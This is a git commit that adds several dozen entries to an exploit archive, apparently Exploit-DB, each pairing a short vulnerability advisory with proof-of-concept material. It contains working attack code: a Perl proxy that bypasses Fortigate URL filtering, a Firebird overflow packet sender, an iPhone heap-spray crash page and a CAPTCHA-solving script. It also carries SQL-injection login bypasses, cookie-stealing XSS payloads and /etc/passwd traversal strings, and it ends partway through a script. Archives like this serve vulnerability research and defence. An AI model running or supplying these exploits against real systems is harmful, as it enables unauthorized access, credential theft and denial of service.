Updated 01_21_2014

2014-01-21 04:28:26 +00:00 · 2014-01-21 04:28:26 +00:00 · acf3e755a7
commit acf3e755a7
parent 1c19131a67
46 changed files with 1349 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -27841,3 +27841,48 @@ id,file,description,date,author,platform,type,port
 31023,platforms/windows/remote/31023.html,"Qvod Player 2.1.5 'QvodInsert.dll' ActiveX Control Remote Buffer Overflow Vulnerability",2008-01-11,anonymous,windows,remote,0
 31024,platforms/hardware/remote/31024.txt,"F5 BIG-IP <= 9.4.3 'SearchString' Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,nnposter,hardware,remote,0
 31025,platforms/cgi/webapps/31025.txt,"Garment Center 'index.cgi' Local File Include Vulnerability",2008-01-14,Smasher,cgi,webapps,0
 31026,platforms/hardware/remote/31026.pl,"Fortinet Fortigate CRLF Characters URL Filtering Bypass Vulnerability",2008-01-14,Danux,hardware,remote,0
 31027,platforms/php/webapps/31027.txt,"pMachine Pro 2.4.1 Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,fuzion,php,webapps,0
 31028,platforms/php/webapps/31028.txt,"Article Dashboard 'admin/login.php' Multiple SQL Injection Vulnerabilities",2008-01-15,Xcross87,php,webapps,0
 31029,platforms/php/webapps/31029.pl,"Peter's Math Anti-Spam for WordPress 0.1.6 Plugin Audio CAPTCHA Security Bypass Vulnerability",2008-01-15,Romero,php,webapps,0
 31030,platforms/php/webapps/31030.pl,"SpamBam WordPress Plugin Key Calculation Security Bypass Vulnerability",2007-01-15,Romero,php,webapps,0
 31031,platforms/hardware/remote/31031.txt,"8E6 R3000 Internet Filter 2.0.5.33 URI Security Bypass Vulnerability",2008-01-16,nnposter,hardware,remote,0
 31034,platforms/php/webapps/31034.txt,"MyBB <= 1.2.10 'moderation.php' Multiple SQL Injection Vulnerabilities",2008-01-16,waraxe,php,webapps,0
 31035,platforms/php/webapps/31035.txt,"Clever Copy 3.0 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-01-17,hadihadi,php,webapps,0
 31036,platforms/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",windows,local,0
 31037,platforms/php/webapps/31037.txt,"phpAutoVideo 2.21 sidebar.php loadpage Parameter Remote File Inclusion",2008-01-18,"H-T Team",php,webapps,0
 31038,platforms/php/webapps/31038.txt,"phpAutoVideo 2.21 index.php cat Parameter XSS",2008-01-18,"H-T Team",php,webapps,0
 31039,platforms/windows/remote/31039.txt,"BitDefender Products Update Server HTTP Daemon Directory Traversal Vulnerability",2008-01-19,"Oliver Karow",windows,remote,0
 31040,platforms/windows/remote/31040.html,"Toshiba Surveillance Surveillix DVR 'MeIpCamX.DLL' 1.0 ActiveX Control Buffer Overflow Vulnerabilities",2008-01-20,rgod,windows,remote,0
 31041,platforms/php/webapps/31041.txt,"bloofoxCMS 0.3 Multiple Input Validation Vulnerabilities",2008-01-20,"AmnPardaz ",php,webapps,0
 31042,platforms/asp/webapps/31042.txt,"MegaBBS 1.5.14b 'upload.asp' Cross-Site Scripting Vulnerability",2008-01-21,Doz,asp,webapps,0
 31043,platforms/cgi/webapps/31043.txt,"Alice Gate2 Plus Wi-Fi Router Cross-Site Request Forgery Vulnerability",2008-01-21,WarGame,cgi,webapps,0
 31044,platforms/php/webapps/31044.txt,"singapore 0.10.1 Modern Template 'gallery' Parameter Cross-Site Scripting Vulnerability",2008-01-21,trew,php,webapps,0
 31045,platforms/php/webapps/31045.txt,"Small Axe Weblog 0.3.1 'ffile' Parameter Remote File Include Vulnerability",2008-01-21,anonymous,php,webapps,0
 31046,platforms/windows/remote/31046.cpp,"GlobalLink 'GLChat.ocx' 2.5.1 ActiveX Control 'ChatRoom()' Buffer Overflow Vulnerability",2008-01-09,Knell,windows,remote,0
 31047,platforms/multiple/remote/31047.txt,"Novemberborn sIFR 2.0.2/3 'txt' Parameter Cross-Site Scripting Vulnerability",2008-01-22,"Jan Fry",multiple,remote,0
 31048,platforms/php/webapps/31048.txt,"PacerCMS 0.6 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-01-22,RawSecurity.org,php,webapps,0
 31049,platforms/php/webapps/31049.txt,"DeluxeBB 1.1 'attachments_header.php' Cross-Site Scripting Vulnerability",2008-01-22,NBBN,php,webapps,0
 31050,platforms/multiple/remote/31050.php,"Firebird <= 2.0.3 Relational Database 'protocol.cpp' XDR Protocol Remote Memory Corruption Vulnerability",2008-01-28,"Damian Frizza",multiple,remote,0
 31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 chrome:// URI JavaScript File Request Information Disclosure Vulnerability",2008-01-19,"Gerry Eisenhaur",linux,remote,0
 31052,platforms/linux/remote/31052.java,"Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability",2008-01-22,"Stefano Di Paola",linux,remote,0
 31053,platforms/php/remote/31053.php,"PHP <= 5.2.5 cURL 'safe mode' Security Bypass Vulnerability",2008-01-23,"Maksymilian Arciemowicz",php,remote,0
 31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products Remote Information Disclosure Vulnerability",2008-01-23,"AmnPardaz ",asp,webapps,0
 31056,platforms/windows/remote/31056.py,"HFS HTTP File Server 1.5/2.x Multiple Security Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
 31057,platforms/osx/dos/31057.html,"Apple iPhone Mobile Safari Memory Exhaustion Remote Denial of Service Vulnerability",2008-01-24,fuzion,osx,dos,0
 31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts 'user_login.asp' Multiple SQL Injection Vulnerabilies",2008-01-25,milad_sa2007,asp,webapps,0
 31059,platforms/asp/webapps/31059.txt,"E-SMART CART 'Members Login' Multiple SQL Injection Vulnerabilies",2008-01-25,milad_sa2007,asp,webapps,0
 31060,platforms/php/webapps/31060.txt,"Drake CMS 0.4.9 'index.php' Cross-Site Scripting Vulnerability",2008-01-25,"Omer Singer",php,webapps,0
 31061,platforms/php/webapps/31061.txt,"trixbox 2.4.2 user/index.php Query String XSS",2008-01-25,"Omer Singer",php,webapps,0
 31062,platforms/php/webapps/31062.txt,"trixbox 2.4.2 maint/index.php Query String XSS",2008-01-25,"Omer Singer",php,webapps,0
 31063,platforms/php/webapps/31063.txt,"WebCalendar 1.1.6 pref.php Query String XSS",2008-01-25,"Omer Singer",php,webapps,0
 31064,platforms/php/webapps/31064.txt,"WebCalendar 1.1.6 search.php adv Parameter XSS",2008-01-25,"Omer Singer",php,webapps,0
 31065,platforms/php/webapps/31065.txt,"F5 BIG-IP Application Security Manager 9.4.3 'report_type' Cross-Site Scripting Vulnerability",2008-01-26,nnposter,php,webapps,0
 31066,platforms/php/webapps/31066.txt,"Mambo MOStlyCE 2.4 Module 'connector.php' Cross-Site Scripting Vulnerability",2008-01-28,"AmnPardaz ",php,webapps,0
 31067,platforms/php/webapps/31067.txt,"ClanSphere 2007.4.4  'install.php' Local File Include Vulnerability",2008-01-28,p4imi0,php,webapps,0
 31068,platforms/php/webapps/31068.txt,"Mambo MOStlyCE Module 2.4 Image Manager Utility Arbitrary File Upload Vulnerability",2008-01-28,"AmnPardaz ",php,webapps,0
 31069,platforms/php/webapps/31069.txt,"eTicket 1.5.6-RC4 'index.php' Cross-Site Scripting Vulnerability",2008-01-28,jekil,php,webapps,0
 31070,platforms/asp/webapps/31070.txt,"ASPired2Protect Login Page SQL Injection Vulnerability",2008-01-28,T_L_O_T_D,asp,webapps,0
 31071,platforms/cgi/webapps/31071.txt,"VB Marketing 'tseekdir.cgi' Local File Include Vulnerability",2008-01-28,"Sw33t h4cK3r",cgi,webapps,0
 31072,platforms/windows/remote/31072.html,"Symantec Backup Exec System Recovery Manager 7.0 FileUpload Class Unauthorized File Upload Vulnerability",2007-01-05,titon,windows,remote,0
 31073,platforms/java/webapps/31073.html,"SunGard Banner Student 7.3 'add1' Parameter Cross-Site Scripting Vulnerability",2008-01-29,"Brendan M. Hickey",java,webapps,0
--- a/platforms/asp/webapps/31042.txt
+++ b/platforms/asp/webapps/31042.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27368/info
 MegaBBS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 MegaBBS 1.5.14b is vulnerable; other versions may also be affected. 
 http://www.example.com/path/profile-upload/upload.asp?target=code 
--- a/platforms/asp/webapps/31055.txt
+++ b/platforms/asp/webapps/31055.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27419/info
 Web Wiz Forums, NewsPad, and Rich Text Editor are prone to a remote information-disclosure vulnerability because they fail to properly sanitize user-supplied input.
 An attacker can exploit this issue to retrieve arbitrary files in the context of the webserver process. Information obtained may aid in further attacks; other attacks are also possible.
 This issue affects Forums 9.07, NewsPad 1.02, and Rich Text Editor 4.0; other versions may also be vulnerable. 
 http://www.example.com/RTE_file_browser.asp?look=&sub=\.....\\\.....\\\.....\\http://www.example.com/RTE_file_browser.asp?look=save&sub=\.....\\\.....\\\.....\\\.....\\\.....\\\ 
--- a/platforms/asp/webapps/31058.txt
+++ b/platforms/asp/webapps/31058.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27450/info
 Pre Hotel and Resorts is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
 Passing the following will bypass the authentication process:
 ' or ' 
--- a/platforms/asp/webapps/31059.txt
+++ b/platforms/asp/webapps/31059.txt
@ -0,0 +1,13 @@
 source: http://www.securityfocus.com/bid/27452/info
 E-SMART CART is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
 The following exploit information is available:
 Passing:
 ' or '
 will bypass the authentication process. 
--- a/platforms/asp/webapps/31070.txt
+++ b/platforms/asp/webapps/31070.txt
@ -0,0 +1,13 @@
 source: http://www.securityfocus.com/bid/27474/info
 ASPired2Protect is prone to an SQL-injection vulnerability because it fails to adequately sanitize user-supplied data.
 A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 The following exploit information is available:
 Passing:
 ' or '
 will bypass the authentication process. 
--- a/platforms/cgi/webapps/31043.txt
+++ b/platforms/cgi/webapps/31043.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/27374/info
 Alice Gate2 Plus Wi-Fi routers are prone to a cross-site request-forgery vulnerability.
 An attacker can exploit this issue to alter administrative configuration on affected devices. Specifically, altering the wireless encryption settings on devices has been demonstrated. Other attacks may also be possible. 
 http://www.example.com/cp06_wifi_m_nocifr.cgi?wlChannel=Auto&wlRadioEnable=on 
--- a/platforms/cgi/webapps/31071.txt
+++ b/platforms/cgi/webapps/31071.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/27475/info
 VB Marketing is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
 An attacker can exploit this vulnerability using directory-traversal strings to include local script code in the context of the application. This may allow the attacker to access sensitive information that may aid in further attacks. 
 http://www.example.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00 
--- a/platforms/hardware/remote/31026.pl
+++ b/platforms/hardware/remote/31026.pl
@ -0,0 +1,222 @@
 source: http://www.securityfocus.com/bid/27276/info
 Fortinet Fortigate is prone to a vulnerability that can allow attackers to bypass the device's URL filtering.
 An attacker can exploit this issue to view unauthorized websites, bypassing certain security restrictions. This may lead to other attacks.
 This issue affects Fortigate-1000 3.00; other versions may also be affected.
 NOTE: This issue may be related to the vulnerability described in BID 16599 (Fortinet Fortigate URL Filtering Bypass Vulnerability).
 #!/usr/bin/perl
 ########################################
 # fortiGuard.pl v0.1 - http://www.macula-group.com/
 #
 # # URL Filtering Bypass proof of concept
 # Author: Daniel Regalado aka Danux... Hacker WannaBe!!! (only some
 minnor modifications from sinhack code)
 # Based on PoC from sinhack research labs -> sakeru.pl
 #
 #FortiGuard's URL blocking functionality can be bypassed by
 specially-crafted HTTP requests that are terminated by the CRLF
 character
 #instead of the LF characters and changing version of HTTP to 1.0
 without sending Host: Header and Fragmenting the GET and POST Requests
 #
 #Tested On: fortiGate-1000 3.00, build 040075,070111
 #
 #This code has been released Only for educational purposes. The author
 cannot be held responsible for any bad use.
 # Usage:
 # 1) perl fortiGuard.pl
 # 2) Configure your browser's proxy at localhost:5050
 # 3) Have fun.
 # --- Start Of Script---
 use strict;
 use URI;
 use IO::Socket;
 my $showOpenedSockets=1; #Activate the console logging
 my $debugging=0;
 my $server = IO::Socket::INET->new ( #Proxy Configuration
   LocalPort => 5050, #Change the listening port here
   Type => SOCK_STREAM,
   Reuse => 1,
   Listen => 10);
 binmode $server;
 print "Waiting for connections on port 5050 TCP...\n";
 while (my $browser = $server->accept()) { #When a connection occure...
   binmode $browser;
   my $method="";
   my $content_length = 0;
   my $content = 0;
   my $accu_content_length = 0;
   my $host;
   my $hostAddr;
   my $httpVer;
   my $line;
 while (my $browser_line = <$browser>) { #Get the Browser commands
      unless ($method) {
        ($method, $hostAddr, $httpVer) = $browser_line =~ /^(\w+)
 +(\S+) +(\S+)/;
        my $uri = URI->new($hostAddr);
        $host = IO::Socket::INET->new ( #Opening the connexion to the
 remote host
          PeerAddr=> $uri->host,
          PeerPort=> $uri->port ) or die "couldn't open $hostAddr";
        if ($showOpenedSockets) { #Connection logs
           #print "Source:".$browser->peerhost."\n";
           my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) =
 localtime(time);
           $year += 1900;
           $mon += 1;
           printf ("\n%04d-%02d-%02d %02d:%02d:%02d
 ",$year,$mon,$mday,$hour,$min,$sec);
           print $browser->peerhost." -> ".$uri->host.":".$uri->port."
 $method ".$uri->path_query."\n";;
        }
        binmode $host;
        my $char;
        if ($method == "GET") { #Fragmention the "GET" query
           foreach $char ('G','E','T',' ') { #I know, there is better
 way to do it,
              print $host $char; #but I'm tired and lazy...
           }
        } elsif ($method == "POST") { #Fragmentation of "POST" query
           foreach $char ('P','O','S','T',' ') {
              print $host $char;
           }
        } else {
           print $host "$method "; #For all the other methods, send
 them without modif
           print "*";
        }
        $httpVer="HTTP/1.0"; #Forzando a version 1.0
        print $host $uri->path_query . " $httpVer\r\n"; #Send the rest
 of the query (url and http version)
        #next;
      }
      $content_length = $1 if $browser_line=~/Content-length: +(\d+)/i;
      $accu_content_length+=length $browser_line;
  foreach $line (split('\n', $browser_line)) { #Fragment the Host query
        if ($line =~ /^Host:/ ) {
                  #my $char="";
                   #my $word="";
                   #my $bogus="";
                   #($bogus,$word) = split(' ', $line);
                   #foreach $char ('H','o','s','t',':',' ') {
                   #print $host $char;
                   #}
                   #print $host $word."\r\n";
        } else {
           print $host "$line\r\n"; #For all the other lines, send
 them without modif
        }
        if ( $debugging == 1 && $method == "POST" ) {
           print "$line\n";
        }
      }
      #Danux Clave para terminar el Request y enviarlo al servidor
 web, de otra forma se queda esperando este ultimo la peticion
      print $host "\r\n";
      last if $browser_line =~ /^\s*$/ and $method ne 'POST';
      if ($browser_line =~ /^\s*$/ and $method eq "POST") {
         $content = 1;
         last unless $content_length;
         next;
      }
      #print length $browser_line . " - ";
      if ($content) {
         $accu_content_length+=length $browser_line;
         last if $accu_content_length >= $content_length;
      }
   }
  $content_length = 0;
   $content = 0;
   $accu_content_length = 0;
   my $crcount=0;
   my $totalcounter=0;
   my $packetcount=0;
   while ( my $host_line = <$host> ) { #Reception of the result from the server
      $totalcounter+=length $host_line;
      print $browser $host_line; #Send them back to the browser
      #print $host_line if ( ! $content ); #Send them back to the browser
      if ($host_line=~/Content-length: +(\d+)/i) {
       $content_length = $1;
       #print " * Expecting $content_length\n"; #if ($debugging);
      }
      if ($host_line =~ m/^\s*$/ and not $content) {
           $content = 1;
           #print " * Beginning of the data section\n";
      }
      if ($content) {
       #$accu_content_length+=length $host_line;
       if ($content_length) {
          #print " * binary data section\n";
          my $buffer;
          my $buffersize = 512;
          if ($content_length < $buffersize) { $buffersize = $content_length; }
          while ( my $nbread = read($host, $buffer, $buffersize)) {
              print "#";
             $packetcount++;
              $accu_content_length+=$nbread;
              #last if $accu_content_length >= $content_length;
              print $browser $buffer; #Send them back to the browser
              #print $buffer;
              #print "\n(#$packetcount) ";
              #print "total: $totalcounter content_length:
 $content_length acc: $accu_content_length\t";
              my $tmp1 = $content_length - $accu_content_length;
              #print "length-accu= $tmp1\n";
              if ($tmp1 < $buffersize) {
               $buffersize = $tmp1;
               #print "new buffersize = $buffersize\n";
              }
           }
           #print "Out of the content while\n";
        }
      }
  #print "(#$packetcount) ";
      #print "total: $totalcounter content_length: $content_length
 acc: $accu_content_length\t";
      #my $tmp1 = $content_length - $accu_content_length;
      #print "length-accu= $tmp1\n";
      last if ($accu_content_length >= $content_length and $content ==
 1 and $content_length);
   }
   #print "\nOut for a while\n";
   if ($browser) { $browser -> close; } #Closing connection to the browser
   if ($host) { $host -> close; } #Closion connection to the server
 }
 # --- EOF ---
--- a/platforms/hardware/remote/31031.txt
+++ b/platforms/hardware/remote/31031.txt
@ -0,0 +1,21 @@
 source: http://www.securityfocus.com/bid/27309/info
 8e6 R3000 Internet Filter is prone to a vulnerability that allows attackers to bypass URI filters.
 Attackers can exploit this issue by sending specially crafted HTTP request packets for an arbitrary website. Successful exploits allow attackers to view sites that the device is meant to block access to. This could aid in further attacks.
 R3000 Internet Filter 2.0.05.33 is vulnerable; other versions may also be affected. 
 packet 1: GE
 packet 2: T / HTTP/1.0\r\n
 packet 1: GET / HTTP/1.0
 X-SomeHeader: ...
 ....
 packet 2: X-SomeOtherHeader: ....
 Host: www.example.com
 ... 
--- a/platforms/java/webapps/31073.html
+++ b/platforms/java/webapps/31073.html
--- a/platforms/linux/remote/31051.txt
+++ b/platforms/linux/remote/31051.txt
@ -0,0 +1,11 @@
 source: http://www.securityfocus.com/bid/27406/info
 Mozilla Firefox is prone to an information-disclosure vulnerability because it fails to restrict access to local JavaScript, images and stylesheets files.
 Attackers can exploit this issue to gain access to potentially sensitive information that could aid in further attacks.
 Firefox 2.0.0.11 is vulnerable; other versions may also be affected.
 NOTE: For an exploit to succeed, a user must have an addon installed that does not store its contents in a '.jar' file. The attacker would have to target a specific addon that uses "flat" packaging. 
 <script>pref = function(x, y){document.write(x + ' -> ' + y + '<br>');};</script> <script src='chrome://downbar/content/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fProgram%20Files%2fMozilla%20Thunderbird%2fgreprefs%2fall.js'></script> 
--- a/platforms/linux/remote/31052.java
+++ b/platforms/linux/remote/31052.java
@ -0,0 +1,26 @@
 source: http://www.securityfocus.com/bid/27409/info
 Apache 'mod_negotiation' is prone to an HTML-injection and an HTTP response-splitting vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
 Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, and influence or misrepresent how web content is served, cached, or interpreted; other attacks are also possible. 
 // Tested on IE 7 and FF 2.0.11, Flash plugin 9.0 r115
 // Compile with flex compiler
 package
 {
  import flash.display.Sprite;
  import flash.net.*
  public class TestXss extends flash.display.Sprite {
    public function TestXss(){
      var r:URLRequest = new URLRequest('http://victim/<img%20src=sa%20
                  onerror=eval(document.location.hash.substr(1))>#alert(123)');
      r.method = 'POST';
      r.data = unescape('test');
      r.requestHeaders.push(new URLRequestHeader('Accept', 'image/jpeg; q=0'));
      navigateToURL(r, '_self');
    }
    }
 }
--- a/platforms/multiple/remote/31047.txt
+++ b/platforms/multiple/remote/31047.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27394/info
 Novemberborn sIFR is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 Versions prior to sIFR 2.0.3 and 3r278 are vulnerable. 
 https://www.example.com/<fontname>.swf?txt=<a href="http://www.example2.com">click me!</a> http://www.example.com/fonts/FuturaLt.swf?txt=%3Ca%20href=%22javascript:alert(document.cookie)%22%3Eclick%20me!%3C/a%3E&textalign=left&offsetTop=-2&textcolor= 
--- a/platforms/multiple/remote/31050.php
+++ b/platforms/multiple/remote/31050.php
@ -0,0 +1,73 @@
 source: http://www.securityfocus.com/bid/27403/info
 Firebird is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. Attackers may exploit this issue to overflow a buffer and to corrupt process memory.
 Attackers may be able to execute arbitrary machine code in the context of an affected application. Failed exploit attempts will likely result in a denial-of-service condition. 
 <?php 
 /** *  FIREBIRD REMOTE BUFFER OVERFLOW.
 *  ITDEFENCE.ru Proof-of-Concept (POC)
 *  Eugene Minaev (underwater@itdefence.ru)
 *
 *  Integer overflow in Firebird SQL 1.0.3 and earlier, 1.5.x before 1.5.6, 2.0.x before 2.0.4, and 2.1.x before 2.1.0 *  RC1 might allow remote attackers to execute arbitrary code via crafted op_receive, op_start, op_start_and_receive, *  op_send, (5) op_start_and_send, and (6) op_start_send_and_receive XDR requests, which triggers memory corruption.
 *
 *  Vulnerable packages
 *
 *      Firebird SQL 1.0.3 and before.
 *      Firebird SQL 1.5.5 and before.
 *      Firebird SQL 2.0.3 and before.
 *      Firebird SQL 2.1.0 Beta 2 and before.
 *
 *  Non-vulnerable packages
 *
 *      Firebird SQL 1.5.6 (to be released)
 *      Firebird SQL 2.0.4 (to be released)
 *      Firebird SQL 2.1.0 RC1
 *
 *  src/remote/protocol.cpp:417
 *
 *      MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_request));
 *      MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_incarnation));
 *      MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_transaction));
 *      MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_message_number));
 *      return xdr_request(xdrs, data->p_data_request,
 *           data->p_data_message_number,
 *           data->p_data_incarnation) ? P_TRUE(xdrs, p) : P_FALSE(xdrs, p);
 *
 *  Firebird Connect Packet
 * *  0x0000   00 00 00 00 00 02 00 00-00 00 00 01 08 00 45 00   ..............E.
 *  0x0010   00 BC 00 00 00 00 40 06-00 25 C0 A8 7C 63 C0 A8   .&#1112;....@..%&#1040;&#1025;|c&#1040;&#1025;
 *  0x0020   7C 63 0B EA 0E 94 00 00-00 01 00 00 00 01 50 10   |c.&#1082;.?........P.
 *  0x0030   40 00 00 00 00 00 00 00-00 01 00 00 00 13 00 00   @...............
 *  0x0040   00 02 00 00 00 1D 00 00-00 3C 43 3A 5C 50 72 6F   .........<C:\Pro
 *  0x0050   67 72 61 6D 20 46 69 6C-65 73 5C 46 69 72 65 62   gram Files\Fireb
 *  0x0060   69 72 64 5C 46 69 72 65-62 69 72 64 5F 31 5F 35   ird\Firebird_1_5
 *  0x0070   5C 65 78 61 6D 70 6C 65-73 5C 45 4D 50 4C 4F 59   \examples\EMPLOY
 *  0x0080   45 45 2E 66 64 62 00 00-00 02 00 00 00 13 01 04   EE.fdb..........
 *  0x0090   52 4F 4F 54 04 09 75 6E-64 65 72 77 68 61 74 06   ROOT..underwhat.
 *  0x00A0   00 00 00 00 00 08 00 00-00 01 00 00 00 02 00 00   ................
 *  0x00B0   00 03 00 00 00 02 00 00-00 0A 00 00 00 01 00 00   ................
 *  0x00C0   00 02 00 00 00 03 00 00-00 04                     ..........
 *       *  Firebird Login Packet.
 *
 *  0x0000   00 00 00 00 00 02 00 00-00 00 00 01 08 00 45 00   ..............E.
 *  0x0010   00 94 00 00 6C 6C 40 06-93 E0 C0 A8 7C 63 C0 A8   .?..ll@.?&#1072;&#1040;&#1025;|c&#1040;&#1025;
 *  0x0020   7C 63 0B EA 0E 94 00 00-00 95 00 00 00 11 50 10   |c.&#1082;.?...?....P.
 *  0x0030   40 00 00 00 00 00 00 00-00 13 00 00 00 00 00 00   @...............
 *  0x0040   00 3C 43 3A 5C 50 72 6F-67 72 61 6D 20 46 69 6C   .<C:\Program Fil
 *  0x0050   65 73 5C 46 69 72 65 62-69 72 64 5C 46 69 72 65   es\Firebird\Fire
 *  0x0060   62 69 72 64 5F 31 5F 35-5C 65 78 61 6D 70 6C 65   bird_1_5\example
 *  0x0070   73 5C 45 4D 50 4C 4F 59-45 45 2E 66 64 62 00 00   s\EMPLOYEE.fdb..
 *  0x0080   00 1E 01 1C 06 53 59 53-44 42 41 1E 0B 51 50 33   .....SYSDBA..QP3
 *  0x0090   4C 4D 5A 2F 4D 4A 68 2E-3A 04 00 00 00 00 3E 00   LMZ/MJh.:.....>.
 *  0x00A0   00 00                                             ..
 *
 */
  $___suntzu = "\x00\x00\x00\x4a" .  str_repeat( "\x4a" , 3000);
  for ($temp = 0; $temp < 5; $temp ++){
     $___zuntzu  =   fsockopen('192.168.124.99',3050);
     fwrite($___zuntzu , $___suntzu);
     fclose($___zuntzu );
     sleep(1);
  }
 ?>
--- a/platforms/osx/dos/31057.html
+++ b/platforms/osx/dos/31057.html
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27442/info
 Apple iPhone is prone to a remote denial-of-service vulnerability.
 Attackers can exploit this issue by enticing an unsuspecting user to view a maliciously crafted webpage. Successful attacks cause a kernel panic, crashing the device. Given the nature of this issue, remote code execution may also be possible, but this has not been confirmed.
 iPhone 1.1.2 and 1.1.3 are affected; other versions may also be vulnerable. 
 <html><body><script> function Demo() { var shellcode; var addr; var fill; alert('attempting a crash!'); shellcode = unescape('%u0c0c'); fill = unescape('%ucccc'); addr = 0x02020202; var b = fill; while (b.length <= 0x40000) b+=b; var c = new Array(); for (var i =0; i<36; i++) { c[i] = b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode; } } </script> <input type='button' onClick='Demo()' value='Go!'> </body></html> 
--- a/platforms/php/remote/31053.php
+++ b/platforms/php/remote/31053.php
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27413/info
 PHP cURL is prone to a 'safe mode' security-bypass vulnerability.
 Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.
 The issue affects PHP 5.2.5 and 5.2.4. 
 var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00&quot;.__FILE__))); 
--- a/platforms/php/webapps/31027.txt
+++ b/platforms/php/webapps/31027.txt
@ -0,0 +1,12 @@
 source: http://www.securityfocus.com/bid/27282/info
 pMachine Pro is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 The issues affect pMachine Pro 2.4.1; other versions may also be vulnerable.
 NOTE: pMachine Pro has been replaced by ExpressionEngine. The vendor recommends upgrading. 
 http://www.example.com/pm/language/spanish/preferences.php?L_PREF_NAME[855]=<script>alert(ZOMG!);</script>
--- a/platforms/php/webapps/31028.txt
+++ b/platforms/php/webapps/31028.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/27286/info
 Article Dashboard is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
 A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
 http://www.example.com/admin/login.php?user=admin'-- | /* 
--- a/platforms/php/webapps/31029.pl
+++ b/platforms/php/webapps/31029.pl
@ -0,0 +1,60 @@
 source: http://www.securityfocus.com/bid/27287/info
 Peter's Math Anti-Spam for WordPress is prone to a security-bypass vulnerability.
 This issue occurs when presenting a visitor with challenge data to determine if they are a legitimate user or an automaton. The challenge data is poorly obfuscated and can be interpreted by script code.
 Attackers can leverage this issue to bypass the security measures provided by the plugin via an automated script. This could aid in spam distribution and other attacks.
 Peter's Math Anti-Spam for WordPress 0.1.6 is vulnerable; other versions may also be affected. 
 $ cat math_spam.pl
 #!/usr/bin/perl -w
 require bytes;
        my $buffer;
        my $number;
        my $op1;
        my $op2;
        my %numberPrints = ("0045", 0,
                            "00c5", 1,
                            "0485", 2,
                            "4309", 3,
                            "0205", 4,
                            "0847", 5,
                            "0601", 6,
                            "0644", 7,
                            "0405", 8,
                            "0031", 9);
        my %numberSizes = ( 0, 4045,
                            1, 3983,
                            2, 4431,
                            3, 4250,
                            4, 4595,
                            5, 5389,
                            6, 4949,
                            7, 4436,
                            8, 4584,
                            9, 5009);
        my $PLUS_SIZE = 7365;
        open (INFILE, "<$ARGV[0]");
        binmode(INFILE);
        sysseek(INFILE, 14, 0); #That "0" third argument makes seeking 
 absoulte
        sysread(INFILE, $buffer, 2);
        #$number = sprintf("%x%x", map {ord($_)} 
 split(//,substr($buffer,0,2)));
        $number = sprintf("%.2x%.2x", map {ord($_)} split(//,$buffer));
        $op1 = $numberPrints{$number};
        sysseek(INFILE, $numberSizes{$op1} + $PLUS_SIZE - 2, 1); #That 
 third "1" argument makes seeking relative
        sysread(INFILE, $buffer, 2);
        $number = sprintf("%.2x%.2x", map {ord($_)} split(//,$buffer));
        $op2 = $numberPrints{$number};
